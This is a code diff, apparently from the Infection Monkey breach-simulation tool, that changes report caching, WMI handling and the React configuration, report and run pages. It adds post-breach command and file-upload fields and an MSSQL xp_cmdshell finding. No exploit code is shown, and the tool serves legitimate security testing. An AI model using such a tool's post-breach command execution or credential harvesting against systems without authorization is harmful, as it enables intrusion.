@staticmethod
|
||||||
def is_report_generated():
|
def is_report_generated():
|
||||||
generated_report = mongo.db.report.find_one({'name': 'generated_report'})
|
generated_report = mongo.db.report.find_one({})
|
||||||
if generated_report is None:
|
return generated_report is not None
|
||||||
return False
|
|
||||||
return generated_report['value']
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def set_report_generated():
|
def generate_report():
|
||||||
mongo.db.report.update(
|
|
||||||
{'name': 'generated_report'},
|
|
||||||
{'$set': {'value': True}},
|
|
||||||
upsert=True)
|
|
||||||
logger.info("Report marked as generated.")
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_report():
|
|
||||||
domain_issues = ReportService.get_domain_issues()
|
domain_issues = ReportService.get_domain_issues()
|
||||||
issues = ReportService.get_issues()
|
issues = ReportService.get_issues()
|
||||||
config_users = ReportService.get_config_users()
|
config_users = ReportService.get_config_users()
|
||||||
config_passwords = ReportService.get_config_passwords()
|
config_passwords = ReportService.get_config_passwords()
|
||||||
cross_segment_issues = ReportService.get_cross_segment_issues()
|
cross_segment_issues = ReportService.get_cross_segment_issues()
|
||||||
|
monkey_latest_modify_time = list(NodeService.get_latest_modified_monkey())[0]['modifytime']
|
||||||
|
|
||||||
report = \
|
report = \
|
||||||
{
|
{
|
||||||
|
@ -710,15 +734,59 @@ class ReportService:
|
||||||
{
|
{
|
||||||
'issues': issues,
|
'issues': issues,
|
||||||
'domain_issues': domain_issues
|
'domain_issues': domain_issues
|
||||||
|
},
|
||||||
|
'meta':
|
||||||
|
{
|
||||||
|
'latest_monkey_modifytime': monkey_latest_modify_time
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
ReportExporterManager().export(report)
|
||||||
finished_run = NodeService.is_monkey_finished_running()
|
mongo.db.report.drop()
|
||||||
if finished_run:
|
mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report))
|
||||||
ReportService.set_report_generated()
|
|
||||||
|
|
||||||
return report
|
return report
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def encode_dot_char_before_mongo_insert(report_dict):
|
||||||
|
"""
|
||||||
|
mongodb doesn't allow for '.' and '$' in a key's name, this function replaces the '.' char with the unicode
|
||||||
|
,,, combo instead.
|
||||||
|
:return: dict with formatted keys with no dots.
|
||||||
|
"""
|
||||||
|
report_as_json = json_util.dumps(report_dict).replace('.', ',,,')
|
||||||
|
return json_util.loads(report_as_json)
|
||||||
|
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def is_latest_report_exists():
|
||||||
|
"""
|
||||||
|
This function checks if a monkey report was already generated and if it's the latest one.
|
||||||
|
:return: True if report is the latest one, False if there isn't a report or its not the latest.
|
||||||
|
"""
|
||||||
|
latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1})
|
||||||
|
|
||||||
|
if latest_report_doc:
|
||||||
|
report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime']
|
||||||
|
latest_monkey_modifytime = NodeService.get_latest_modified_monkey()[0]['modifytime']
|
||||||
|
return report_latest_modifytime == latest_monkey_modifytime
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def decode_dot_char_before_mongo_insert(report_dict):
|
||||||
|
"""
|
||||||
|
this function replaces the ',,,' combo with the '.' char instead.
|
||||||
|
:return: report dict with formatted keys (',,,' -> '.')
|
||||||
|
"""
|
||||||
|
report_as_json = json_util.dumps(report_dict).replace(',,,', '.')
|
||||||
|
return json_util.loads(report_as_json)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_report():
|
||||||
|
if ReportService.is_latest_report_exists():
|
||||||
|
return ReportService.decode_dot_char_before_mongo_insert(mongo.db.report.find_one())
|
||||||
|
return ReportService.generate_report()
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def did_exploit_type_succeed(exploit_type):
|
def did_exploit_type_succeed(exploit_type):
|
||||||
return mongo.db.edge.count(
|
return mongo.db.edge.count(
|
||||||
|
|
|
@ -13,11 +13,18 @@ class WMIHandler(object):
|
||||||
self.monkey_id = monkey_id
|
self.monkey_id = monkey_id
|
||||||
self.info_for_mongo = {}
|
self.info_for_mongo = {}
|
||||||
self.users_secrets = user_secrets
|
self.users_secrets = user_secrets
|
||||||
self.users_info = wmi_info['Win32_UserAccount']
|
if not wmi_info:
|
||||||
self.groups_info = wmi_info['Win32_Group']
|
self.users_info = ""
|
||||||
self.groups_and_users = wmi_info['Win32_GroupUser']
|
self.groups_info = ""
|
||||||
self.services = wmi_info['Win32_Service']
|
self.groups_and_users = ""
|
||||||
self.products = wmi_info['Win32_Product']
|
self.services = ""
|
||||||
|
self.products = ""
|
||||||
|
else:
|
||||||
|
self.users_info = wmi_info['Win32_UserAccount']
|
||||||
|
self.groups_info = wmi_info['Win32_Group']
|
||||||
|
self.groups_and_users = wmi_info['Win32_GroupUser']
|
||||||
|
self.services = wmi_info['Win32_Service']
|
||||||
|
self.products = wmi_info['Win32_Product']
|
||||||
|
|
||||||
def process_and_handle_wmi_info(self):
|
def process_and_handle_wmi_info(self):
|
||||||
|
|
||||||
|
@ -25,7 +32,8 @@ class WMIHandler(object):
|
||||||
self.add_users_to_collection()
|
self.add_users_to_collection()
|
||||||
self.create_group_user_connection()
|
self.create_group_user_connection()
|
||||||
self.insert_info_to_mongo()
|
self.insert_info_to_mongo()
|
||||||
self.add_admin(self.info_for_mongo[self.ADMINISTRATORS_GROUP_KNOWN_SID], self.monkey_id)
|
if self.info_for_mongo:
|
||||||
|
self.add_admin(self.info_for_mongo[self.ADMINISTRATORS_GROUP_KNOWN_SID], self.monkey_id)
|
||||||
self.update_admins_retrospective()
|
self.update_admins_retrospective()
|
||||||
self.update_critical_services()
|
self.update_critical_services()
|
||||||
|
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -68,6 +68,7 @@
|
||||||
"core-js": "^2.5.7",
|
"core-js": "^2.5.7",
|
||||||
"downloadjs": "^1.4.7",
|
"downloadjs": "^1.4.7",
|
||||||
"fetch": "^1.1.0",
|
"fetch": "^1.1.0",
|
||||||
|
"filepond": "^4.2.0",
|
||||||
"js-file-download": "^0.4.4",
|
"js-file-download": "^0.4.4",
|
||||||
"json-loader": "^0.5.7",
|
"json-loader": "^0.5.7",
|
||||||
"jwt-decode": "^2.2.0",
|
"jwt-decode": "^2.2.0",
|
||||||
|
@ -83,6 +84,7 @@
|
||||||
"react-dimensions": "^1.3.0",
|
"react-dimensions": "^1.3.0",
|
||||||
"react-dom": "^16.5.2",
|
"react-dom": "^16.5.2",
|
||||||
"react-fa": "^5.0.0",
|
"react-fa": "^5.0.0",
|
||||||
|
"react-filepond": "^7.0.1",
|
||||||
"react-graph-vis": "^1.0.2",
|
"react-graph-vis": "^1.0.2",
|
||||||
"react-json-tree": "^0.11.0",
|
"react-json-tree": "^0.11.0",
|
||||||
"react-jsonschema-form": "^1.0.5",
|
"react-jsonschema-form": "^1.0.5",
|
||||||
|
@ -90,6 +92,7 @@
|
||||||
"react-router-dom": "^4.3.1",
|
"react-router-dom": "^4.3.1",
|
||||||
"react-table": "^6.8.6",
|
"react-table": "^6.8.6",
|
||||||
"react-toggle": "^4.0.1",
|
"react-toggle": "^4.0.1",
|
||||||
"redux": "^4.0.0"
|
"redux": "^4.0.0",
|
||||||
|
"sha3": "^2.0.0"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -6,6 +6,7 @@ class AuthComponent extends React.Component {
|
||||||
super(props);
|
super(props);
|
||||||
this.auth = new AuthService();
|
this.auth = new AuthService();
|
||||||
this.authFetch = this.auth.authFetch;
|
this.authFetch = this.auth.authFetch;
|
||||||
|
this.jwtHeader = this.auth.jwtHeader();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -27,31 +27,44 @@ let guardicoreLogoImage = require('../images/guardicore-logo.png');
|
||||||
|
|
||||||
class AppComponent extends AuthComponent {
|
class AppComponent extends AuthComponent {
|
||||||
updateStatus = () => {
|
updateStatus = () => {
|
||||||
if (this.auth.loggedIn()){
|
this.auth.loggedIn()
|
||||||
this.authFetch('/api')
|
.then(res => {
|
||||||
.then(res => res.json())
|
if (this.state.isLoggedIn !== res) {
|
||||||
.then(res => {
|
this.setState({
|
||||||
// This check is used to prevent unnecessary re-rendering
|
isLoggedIn: res
|
||||||
let isChanged = false;
|
});
|
||||||
for (let step in this.state.completedSteps) {
|
}
|
||||||
if (this.state.completedSteps[step] !== res['completed_steps'][step]) {
|
|
||||||
isChanged = true;
|
if (res) {
|
||||||
break;
|
this.authFetch('/api')
|
||||||
}
|
.then(res => res.json())
|
||||||
}
|
.then(res => {
|
||||||
if (isChanged) {
|
// This check is used to prevent unnecessary re-rendering
|
||||||
this.setState({completedSteps: res['completed_steps']});
|
let isChanged = false;
|
||||||
}
|
for (let step in this.state.completedSteps) {
|
||||||
});
|
if (this.state.completedSteps[step] !== res['completed_steps'][step]) {
|
||||||
}
|
isChanged = true;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (isChanged) {
|
||||||
|
this.setState({completedSteps: res['completed_steps']});
|
||||||
|
}
|
||||||
|
});
|
||||||
|
}
|
||||||
|
});
|
||||||
};
|
};
|
||||||
|
|
||||||
renderRoute = (route_path, page_component, is_exact_path = false) => {
|
renderRoute = (route_path, page_component, is_exact_path = false) => {
|
||||||
let render_func = (props) => {
|
let render_func = (props) => {
|
||||||
if (this.auth.loggedIn()) {
|
switch (this.state.isLoggedIn) {
|
||||||
return page_component;
|
case true:
|
||||||
} else {
|
return page_component;
|
||||||
return <Redirect to={{pathname: '/login'}}/>;
|
case false:
|
||||||
|
return <Redirect to={{pathname: '/login'}}/>;
|
||||||
|
default:
|
||||||
|
return page_component;
|
||||||
|
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -65,15 +78,22 @@ class AppComponent extends AuthComponent {
|
||||||
constructor(props) {
|
constructor(props) {
|
||||||
super(props);
|
super(props);
|
||||||
this.state = {
|
this.state = {
|
||||||
|
removePBAfiles: false,
|
||||||
completedSteps: {
|
completedSteps: {
|
||||||
run_server: true,
|
run_server: true,
|
||||||
run_monkey: false,
|
run_monkey: false,
|
||||||
infection_done: false,
|
infection_done: false,
|
||||||
report_done: false
|
report_done: false,
|
||||||
|
isLoggedIn: undefined
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Sets the property that indicates if we need to remove PBA files from state or not
|
||||||
|
setRemovePBAfiles = (rmFiles) => {
|
||||||
|
this.setState({removePBAfiles: rmFiles});
|
||||||
|
};
|
||||||
|
|
||||||
componentDidMount() {
|
componentDidMount() {
|
||||||
this.updateStatus();
|
this.updateStatus();
|
||||||
this.interval = setInterval(this.updateStatus, 5000);
|
this.interval = setInterval(this.updateStatus, 5000);
|
||||||
|
|
|
@ -3,15 +3,43 @@ import Form from 'react-jsonschema-form';
|
||||||
import {Col, Nav, NavItem} from 'react-bootstrap';
|
import {Col, Nav, NavItem} from 'react-bootstrap';
|
||||||
import fileDownload from 'js-file-download';
|
import fileDownload from 'js-file-download';
|
||||||
import AuthComponent from '../AuthComponent';
|
import AuthComponent from '../AuthComponent';
|
||||||
|
import { FilePond } from 'react-filepond';
|
||||||
|
import 'filepond/dist/filepond.min.css';
|
||||||
|
|
||||||
class ConfigurePageComponent extends AuthComponent {
|
class ConfigurePageComponent extends AuthComponent {
|
||||||
constructor(props) {
|
constructor(props) {
|
||||||
super(props);
|
super(props);
|
||||||
|
this.PBAwindowsPond = null;
|
||||||
|
this.PBAlinuxPond = null;
|
||||||
this.currentSection = 'basic';
|
this.currentSection = 'basic';
|
||||||
this.currentFormData = {};
|
this.currentFormData = {};
|
||||||
this.sectionsOrder = ['basic', 'basic_network', 'monkey', 'cnc', 'network', 'exploits', 'internal'];
|
this.sectionsOrder = ['basic', 'basic_network', 'monkey', 'cnc', 'network', 'exploits', 'internal'];
|
||||||
|
this.uiSchema = {
|
||||||
|
behaviour: {
|
||||||
|
custom_PBA_linux_cmd: {
|
||||||
|
"ui:widget": "textarea",
|
||||||
|
"ui:emptyValue": ""
|
||||||
|
},
|
||||||
|
PBA_linux_file: {
|
||||||
|
"ui:widget": this.PBAlinux
|
||||||
|
},
|
||||||
|
custom_PBA_windows_cmd: {
|
||||||
|
"ui:widget": "textarea",
|
||||||
|
"ui:emptyValue": ""
|
||||||
|
},
|
||||||
|
PBA_windows_file: {
|
||||||
|
"ui:widget": this.PBAwindows
|
||||||
|
},
|
||||||
|
PBA_linux_filename: {
|
||||||
|
classNames: "linux-pba-file-info",
|
||||||
|
"ui:emptyValue": ""
|
||||||
|
},
|
||||||
|
PBA_windows_filename: {
|
||||||
|
classNames: "windows-pba-file-info",
|
||||||
|
"ui:emptyValue": ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
// set schema from server
|
// set schema from server
|
||||||
this.state = {
|
this.state = {
|
||||||
schema: {},
|
schema: {},
|
||||||
|
@ -19,12 +47,14 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
lastAction: 'none',
|
lastAction: 'none',
|
||||||
sections: [],
|
sections: [],
|
||||||
selectedSection: 'basic',
|
selectedSection: 'basic',
|
||||||
allMonkeysAreDead: true
|
allMonkeysAreDead: true,
|
||||||
|
PBAwinFile: [],
|
||||||
|
PBAlinuxFile: []
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
componentDidMount() {
|
componentDidMount() {
|
||||||
this.authFetch('/api/configuration')
|
this.authFetch('/api/configuration/island')
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
let sections = [];
|
let sections = [];
|
||||||
|
@ -44,7 +74,7 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
onSubmit = ({formData}) => {
|
onSubmit = ({formData}) => {
|
||||||
this.currentFormData = formData;
|
this.currentFormData = formData;
|
||||||
this.updateConfigSection();
|
this.updateConfigSection();
|
||||||
this.authFetch('/api/configuration',
|
this.authFetch('/api/configuration/island',
|
||||||
{
|
{
|
||||||
method: 'POST',
|
method: 'POST',
|
||||||
headers: {'Content-Type': 'application/json'},
|
headers: {'Content-Type': 'application/json'},
|
||||||
|
@ -93,7 +123,8 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
};
|
};
|
||||||
|
|
||||||
resetConfig = () => {
|
resetConfig = () => {
|
||||||
this.authFetch('/api/configuration',
|
this.removePBAfiles();
|
||||||
|
this.authFetch('/api/configuration/island',
|
||||||
{
|
{
|
||||||
method: 'POST',
|
method: 'POST',
|
||||||
headers: {'Content-Type': 'application/json'},
|
headers: {'Content-Type': 'application/json'},
|
||||||
|
@ -110,6 +141,21 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
});
|
});
|
||||||
};
|
};
|
||||||
|
|
||||||
|
removePBAfiles(){
|
||||||
|
// We need to clean files from widget, local state and configuration (to sync with bac end)
|
||||||
|
if (this.PBAwindowsPond !== null){
|
||||||
|
this.PBAwindowsPond.removeFile();
|
||||||
|
}
|
||||||
|
if (this.PBAlinuxPond !== null){
|
||||||
|
this.PBAlinuxPond.removeFile();
|
||||||
|
}
|
||||||
|
let request_options = {method: 'DELETE',
|
||||||
|
headers: {'Content-Type': 'text/plain'}};
|
||||||
|
this.authFetch('/api/fileUpload/PBAlinux', request_options);
|
||||||
|
this.authFetch('/api/fileUpload/PBAwindows', request_options);
|
||||||
|
this.setState({PBAlinuxFile: [], PBAwinFile: []});
|
||||||
|
}
|
||||||
|
|
||||||
onReadFile = (event) => {
|
onReadFile = (event) => {
|
||||||
try {
|
try {
|
||||||
this.setState({
|
this.setState({
|
||||||
|
@ -141,19 +187,96 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
// This check is used to prevent unnecessary re-rendering
|
// This check is used to prevent unnecessary re-rendering
|
||||||
this.setState({
|
let allMonkeysAreDead = (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']);
|
||||||
allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done'])
|
if (allMonkeysAreDead !== this.state.allMonkeysAreDead) {
|
||||||
});
|
this.setState({
|
||||||
|
allMonkeysAreDead: allMonkeysAreDead
|
||||||
|
});
|
||||||
|
}
|
||||||
});
|
});
|
||||||
};
|
};
|
||||||
|
|
||||||
|
PBAwindows = () => {
|
||||||
|
return (<FilePond
|
||||||
|
server={{ url:'/api/fileUpload/PBAwindows',
|
||||||
|
process: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
revert: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
restore: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
load: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
fetch: {headers: {'Authorization': this.jwtHeader}}
|
||||||
|
}}
|
||||||
|
files={this.getWinPBAfile()}
|
||||||
|
onupdatefiles={fileItems => {
|
||||||
|
this.setState({
|
||||||
|
PBAwinFile: fileItems.map(fileItem => fileItem.file)
|
||||||
|
})
|
||||||
|
}}
|
||||||
|
ref={ref => this.PBAwindowsPond = ref}
|
||||||
|
/>)
|
||||||
|
};
|
||||||
|
|
||||||
|
PBAlinux = () => {
|
||||||
|
return (<FilePond
|
||||||
|
server={{ url:'/api/fileUpload/PBAlinux',
|
||||||
|
process: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
revert: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
restore: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
load: {headers: {'Authorization': this.jwtHeader}},
|
||||||
|
fetch: {headers: {'Authorization': this.jwtHeader}}
|
||||||
|
}}
|
||||||
|
files={this.getLinuxPBAfile()}
|
||||||
|
onupdatefiles={fileItems => {
|
||||||
|
this.setState({
|
||||||
|
PBAlinuxFile: fileItems.map(fileItem => fileItem.file)
|
||||||
|
})
|
||||||
|
}}
|
||||||
|
ref={ref => this.PBAlinuxPond = ref}
|
||||||
|
/>)
|
||||||
|
};
|
||||||
|
|
||||||
|
getWinPBAfile(){
|
||||||
|
if (this.state.PBAwinFile.length !== 0){
|
||||||
|
return ConfigurePageComponent.getMockPBAfile(this.state.PBAwinFile[0])
|
||||||
|
} else if (this.state.configuration.monkey.behaviour.PBA_windows_filename){
|
||||||
|
return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_windows_filename)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
getLinuxPBAfile(){
|
||||||
|
if (this.state.PBAlinuxFile.length !== 0){
|
||||||
|
return ConfigurePageComponent.getMockPBAfile(this.state.PBAlinuxFile[0])
|
||||||
|
} else if (this.state.configuration.monkey.behaviour.PBA_linux_filename) {
|
||||||
|
return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_linux_filename)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static getFullPBAfile(filename){
|
||||||
|
let pbaFile = [{
|
||||||
|
source: filename,
|
||||||
|
options: {
|
||||||
|
type: 'limbo'
|
||||||
|
}
|
||||||
|
}];
|
||||||
|
return pbaFile
|
||||||
|
}
|
||||||
|
|
||||||
|
static getMockPBAfile(mockFile){
|
||||||
|
let pbaFile = [{
|
||||||
|
source: mockFile.name,
|
||||||
|
options: {
|
||||||
|
type: 'limbo'
|
||||||
|
}
|
||||||
|
}];
|
||||||
|
pbaFile[0].options.file = mockFile;
|
||||||
|
return pbaFile
|
||||||
|
}
|
||||||
|
|
||||||
render() {
|
render() {
|
||||||
let displayedSchema = {};
|
let displayedSchema = {};
|
||||||
if (this.state.schema.hasOwnProperty('properties')) {
|
if (this.state.schema.hasOwnProperty('properties')) {
|
||||||
displayedSchema = this.state.schema['properties'][this.state.selectedSection];
|
displayedSchema = this.state.schema['properties'][this.state.selectedSection];
|
||||||
displayedSchema['definitions'] = this.state.schema['definitions'];
|
displayedSchema['definitions'] = this.state.schema['definitions'];
|
||||||
}
|
}
|
||||||
|
|
||||||
return (
|
return (
|
||||||
<Col xs={12} lg={8}>
|
<Col xs={12} lg={8}>
|
||||||
<h1 className="page-title">Monkey Configuration</h1>
|
<h1 className="page-title">Monkey Configuration</h1>
|
||||||
|
@ -175,9 +298,11 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
}
|
}
|
||||||
{ this.state.selectedSection ?
|
{ this.state.selectedSection ?
|
||||||
<Form schema={displayedSchema}
|
<Form schema={displayedSchema}
|
||||||
|
uiSchema={this.uiSchema}
|
||||||
formData={this.state.configuration[this.state.selectedSection]}
|
formData={this.state.configuration[this.state.selectedSection]}
|
||||||
onSubmit={this.onSubmit}
|
onSubmit={this.onSubmit}
|
||||||
onChange={this.onChange}>
|
onChange={this.onChange}
|
||||||
|
noValidate={true}>
|
||||||
<div>
|
<div>
|
||||||
{ this.state.allMonkeysAreDead ?
|
{ this.state.allMonkeysAreDead ?
|
||||||
'' :
|
'' :
|
||||||
|
@ -240,7 +365,6 @@ class ConfigurePageComponent extends AuthComponent {
|
||||||
</div>
|
</div>
|
||||||
: ''}
|
: ''}
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
</Col>
|
</Col>
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
|
@ -34,9 +34,12 @@ class LoginPageComponent extends React.Component {
|
||||||
this.state = {
|
this.state = {
|
||||||
failed: false
|
failed: false
|
||||||
};
|
};
|
||||||
if (this.auth.loggedIn()) {
|
this.auth.loggedIn()
|
||||||
this.redirectToHome();
|
.then(res => {
|
||||||
}
|
if (res) {
|
||||||
|
this.redirectToHome();
|
||||||
|
}
|
||||||
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
render() {
|
render() {
|
||||||
|
|
|
@ -2,6 +2,7 @@ import React from 'react';
|
||||||
import {Button, Col} from 'react-bootstrap';
|
import {Button, Col} from 'react-bootstrap';
|
||||||
import BreachedServers from 'components/report-components/BreachedServers';
|
import BreachedServers from 'components/report-components/BreachedServers';
|
||||||
import ScannedServers from 'components/report-components/ScannedServers';
|
import ScannedServers from 'components/report-components/ScannedServers';
|
||||||
|
import PostBreach from 'components/report-components/PostBreach';
|
||||||
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
|
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
|
||||||
import {edgeGroupToColor, options} from 'components/map/MapOptions';
|
import {edgeGroupToColor, options} from 'components/map/MapOptions';
|
||||||
import StolenPasswords from 'components/report-components/StolenPasswords';
|
import StolenPasswords from 'components/report-components/StolenPasswords';
|
||||||
|
@ -29,7 +30,8 @@ class ReportPageComponent extends AuthComponent {
|
||||||
STRUTS2: 8,
|
STRUTS2: 8,
|
||||||
WEBLOGIC: 9,
|
WEBLOGIC: 9,
|
||||||
HADOOP: 10,
|
HADOOP: 10,
|
||||||
PTH_CRIT_SERVICES_ACCESS: 11
|
PTH_CRIT_SERVICES_ACCESS: 11,
|
||||||
|
MSSQL: 12
|
||||||
};
|
};
|
||||||
|
|
||||||
Warning =
|
Warning =
|
||||||
|
@ -104,7 +106,7 @@ class ReportPageComponent extends AuthComponent {
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
res.edges.forEach(edge => {
|
res.edges.forEach(edge => {
|
||||||
edge.color = edgeGroupToColor(edge.group);
|
edge.color = {'color': edgeGroupToColor(edge.group)};
|
||||||
});
|
});
|
||||||
this.setState({graph: res});
|
this.setState({graph: res});
|
||||||
this.props.onStatusChange();
|
this.props.onStatusChange();
|
||||||
|
@ -341,6 +343,8 @@ class ReportPageComponent extends AuthComponent {
|
||||||
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
||||||
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
|
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
|
||||||
<li>Mimikatz found login credentials of a user who has admin access to a server defined as critical.</li>: null }
|
<li>Mimikatz found login credentials of a user who has admin access to a server defined as critical.</li>: null }
|
||||||
|
{this.state.report.overview.issues[this.Issue.MSSQL] ?
|
||||||
|
<li>MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.</li> : null }
|
||||||
</ul>
|
</ul>
|
||||||
</div>
|
</div>
|
||||||
:
|
:
|
||||||
|
@ -412,7 +416,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
<div>
|
<div>
|
||||||
{this.generateIssues(this.state.report.recommendations.issues)}
|
{this.generateIssues(this.state.report.recommendations.issues)}
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
</div>
|
</div>
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
@ -458,6 +461,9 @@ class ReportPageComponent extends AuthComponent {
|
||||||
<div style={{marginBottom: '20px'}}>
|
<div style={{marginBottom: '20px'}}>
|
||||||
<BreachedServers data={this.state.report.glance.exploited}/>
|
<BreachedServers data={this.state.report.glance.exploited}/>
|
||||||
</div>
|
</div>
|
||||||
|
<div style={{marginBottom: '20px'}}>
|
||||||
|
<PostBreach data={this.state.report.glance.scanned}/>
|
||||||
|
</div>
|
||||||
<div style={{marginBottom: '20px'}}>
|
<div style={{marginBottom: '20px'}}>
|
||||||
<ScannedServers data={this.state.report.glance.scanned}/>
|
<ScannedServers data={this.state.report.glance.scanned}/>
|
||||||
</div>
|
</div>
|
||||||
|
@ -867,7 +873,23 @@ class ReportPageComponent extends AuthComponent {
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
generateMSSQLIssue(issue) {
|
||||||
|
return(
|
||||||
|
<li>
|
||||||
|
Disable the xp_cmdshell option.
|
||||||
|
<CollapsibleWellComponent>
|
||||||
|
The machine <span className="label label-primary">{issue.machine}</span> (<span
|
||||||
|
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
|
||||||
|
className="label label-danger">MSSQL exploit attack</span>.
|
||||||
|
<br/>
|
||||||
|
The attack was made possible because the target machine used an outdated MSSQL server configuration allowing
|
||||||
|
the usage of the xp_cmdshell command. To learn more about how to disable this feature, read <a
|
||||||
|
href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017">
|
||||||
|
Microsoft's documentation. </a>
|
||||||
|
</CollapsibleWellComponent>
|
||||||
|
</li>
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
generateIssue = (issue) => {
|
generateIssue = (issue) => {
|
||||||
let data;
|
let data;
|
||||||
|
@ -935,6 +957,9 @@ class ReportPageComponent extends AuthComponent {
|
||||||
case 'hadoop':
|
case 'hadoop':
|
||||||
data = this.generateHadoopIssue(issue);
|
data = this.generateHadoopIssue(issue);
|
||||||
break;
|
break;
|
||||||
|
case 'mssql':
|
||||||
|
data = this.generateMSSQLIssue(issue);
|
||||||
|
break;
|
||||||
}
|
}
|
||||||
return data;
|
return data;
|
||||||
};
|
};
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
import React from 'react';
|
import React from 'react';
|
||||||
import {Button, Col, Well, Nav, NavItem, Collapse} from 'react-bootstrap';
|
import {Button, Col, Well, Nav, NavItem, Collapse, Form, FormControl, FormGroup} from 'react-bootstrap';
|
||||||
import CopyToClipboard from 'react-copy-to-clipboard';
|
import CopyToClipboard from 'react-copy-to-clipboard';
|
||||||
import {Icon} from 'react-fa';
|
import {Icon} from 'react-fa';
|
||||||
import {Link} from 'react-router-dom';
|
import {Link} from 'react-router-dom';
|
||||||
import AuthComponent from '../AuthComponent';
|
import AuthComponent from '../AuthComponent';
|
||||||
|
import AwsRunTable from "../run-monkey/AwsRunTable";
|
||||||
|
|
||||||
class RunMonkeyPageComponent extends AuthComponent {
|
class RunMonkeyPageComponent extends AuthComponent {
|
||||||
|
|
||||||
|
@ -13,10 +14,19 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
ips: [],
|
ips: [],
|
||||||
runningOnIslandState: 'not_running',
|
runningOnIslandState: 'not_running',
|
||||||
runningOnClientState: 'not_running',
|
runningOnClientState: 'not_running',
|
||||||
|
awsClicked: false,
|
||||||
selectedIp: '0.0.0.0',
|
selectedIp: '0.0.0.0',
|
||||||
selectedOs: 'windows-32',
|
selectedOs: 'windows-32',
|
||||||
showManual: false
|
showManual: false,
|
||||||
};
|
showAws: false,
|
||||||
|
isOnAws: false,
|
||||||
|
isAwsAuth: false,
|
||||||
|
awsUpdateClicked: false,
|
||||||
|
awsUpdateFailed: false,
|
||||||
|
awsKeyId: '',
|
||||||
|
awsSecretKey: '',
|
||||||
|
awsMachines: []
|
||||||
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
componentDidMount() {
|
componentDidMount() {
|
||||||
|
@ -37,6 +47,15 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
|
|
||||||
|
this.fetchAwsInfo();
|
||||||
|
this.fetchConfig()
|
||||||
|
.then(config => {
|
||||||
|
this.setState({
|
||||||
|
awsKeyId: config['cnc']['aws_config']['aws_access_key_id'],
|
||||||
|
awsSecretKey: config['cnc']['aws_config']['aws_secret_access_key']
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
this.authFetch('/api/client-monkey')
|
this.authFetch('/api/client-monkey')
|
||||||
.then(res => res.json())
|
.then(res => res.json())
|
||||||
.then(res => {
|
.then(res => {
|
||||||
|
